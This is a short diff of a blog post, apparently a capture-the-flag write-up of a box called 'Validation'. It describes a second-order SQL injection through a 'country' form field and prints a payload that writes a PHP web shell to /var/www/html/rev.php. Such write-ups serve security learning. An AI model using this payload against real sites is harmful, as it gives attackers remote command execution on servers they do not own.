MosesKonsue/MosesKonsue.github.io/_posts/2021-09-24-Validation.md

 ```
 This shows that the site is taking our user-supplied data and then incorporating it into the account.php query, a "Second-order SQL injection".

-So it is possible to write a file into the `/var/www/html` directory, which means we can place a simple php web shell in our burpsuite request with SQL commands:
+So it is possible to write a file into the `/var/www/html` directory, which means we can place a simple php web shell onto the box by way of our burpsuite request with SQL commands:

 ```
 username=test&country=Brazil' union select "<?php SYSTEM($_REQUEST['cmd']); ?>" into outfile '/var/www/html/rev.php'-- -